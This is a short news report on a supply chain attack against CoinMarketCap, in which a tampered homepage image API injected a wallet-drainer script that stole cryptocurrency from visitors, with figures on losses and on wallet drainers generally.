The popular cryptocurrency price tracking site, CoinMarketCap, suffered a very serious website supply chain security attack. This attack exposed the site’s many visitors to a wallet drainer campaign designed to steal their cryptocurrency. On Friday evening, visitors began seeing Web3 popups which were asking them to connect their crypto wallets. When the visitors connected their wallets, a malicious script then proceeded to drain all the cryptocurrency from them.
The company later confirmed that threat actors had utilized a vulnerability in the site’s homepage “doodle” image. The attackers modified the API used by the site to retrieve this doodle image to display on the homepage. This tampered API payload then included a malicious script tag which injected a wallet drainer into the site. When someone visited the page, the script would execute and then display a fake wallet connect popup.
More details about the attack later came from a threat actor who is known to go by “Rey.”
He said the attackers shared a screenshot of the drainer’s control panel on a popular Telegram channel. This panel clearly indicated that over forty-three thousand dollars was stolen from one hundred ten different victims. This information confirmed the financial impact of the supply chain attack, with the actors speaking French on Telegram.
As the popularity of cryptocurrency has boomed, so has the very significant threat that comes from wallet drainers.
These types of attacks are most often promoted through social media posts, online advertisements, and many spoofed websites. Recent industry reports indicate that wallet drainers stole almost five hundred million dollars throughout the year of 2024. The problem has now become so pervasive that Mozilla recently introduced a brand new system to detect them.
Reference: